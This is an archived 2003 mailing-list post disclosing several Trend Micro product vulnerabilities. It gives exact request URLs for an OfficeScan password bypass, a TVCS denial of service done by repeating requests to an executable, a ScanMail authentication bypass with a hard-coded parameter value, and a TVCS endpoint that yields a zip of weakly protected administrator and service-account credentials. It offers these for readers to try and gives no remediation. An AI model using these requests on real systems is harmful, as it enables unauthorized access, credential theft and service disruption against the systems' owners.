|
|||||||||||
|
Assorted Trend Vulns Rev 2.0
From: Rod Boron <rod_boron(at)yahoo.com>
Date: Tue Jan 14 2003 - 20:44:20 EST
Information
I have had these sitting around for about a year
and just said "fawk it" and am giving 'em to the
community to sort through before they start growing
edible fungi. Not even sure if they work on newer
versions of
All of these "vulns", per say, can be accessed
publicly
Despite these oddities, in my opinion, Trend still
excels over others in it's capabilities and
integration
Well, enjoy, discuss, criticize, elaborate,
manipulate,
Rodney Boron
Rod_Boron-AT-Yahoo.com *******Trend Officescan password change/bypass*******
http://x.x.x.x/officescan/cgi/cgiMasterPwd.exe
Allows you to skip the default
*******Trend Micro TVCS IIS Dos*******
http://x.x.x.x/tvcs/activesupport.exe 10 requests for this .exe will cause 10 instances of ActiveSupport.exe to be started. Each consuming 2.5 M's of memory and causing a Dos effect on IIS lasting for up to 5 minutes till each instance of the .exe timesout. *******Trend Scanmail Password Bypass*******
http://x.x.x.x:16372/smg_Smxcfg30.exe?vcc=3560121183d3 Some magical backdoor Trend installed to bypass authentication into their web management page for Scanmail for Exchange. Does it work on other Scanmail versions? *******Trend Micro TVCS Log Collector*******
This one gives up the farm and the rooster's eggs. huh? http://x.x.x.x/tvcs/getservers.exe?action=selects1 Follow the steps 2-4 and download a very well endowed zip file. Within holds the kings jewels. Trivial encrytion protects both the TVCS password and the service user account and password. Bet lazy admins are running Trend as administrator. Some other enumeration goodies in there to tickle one's imagination. .................................................... Where "x.x.x.x" is equivalent to: -----------== Vin Diesel ==-------------
in
"The Fast, the Furious, and the Fortran" Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com Received on Tue Jan 21 18:15:35 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT |
||||||||||
|
|||||||||||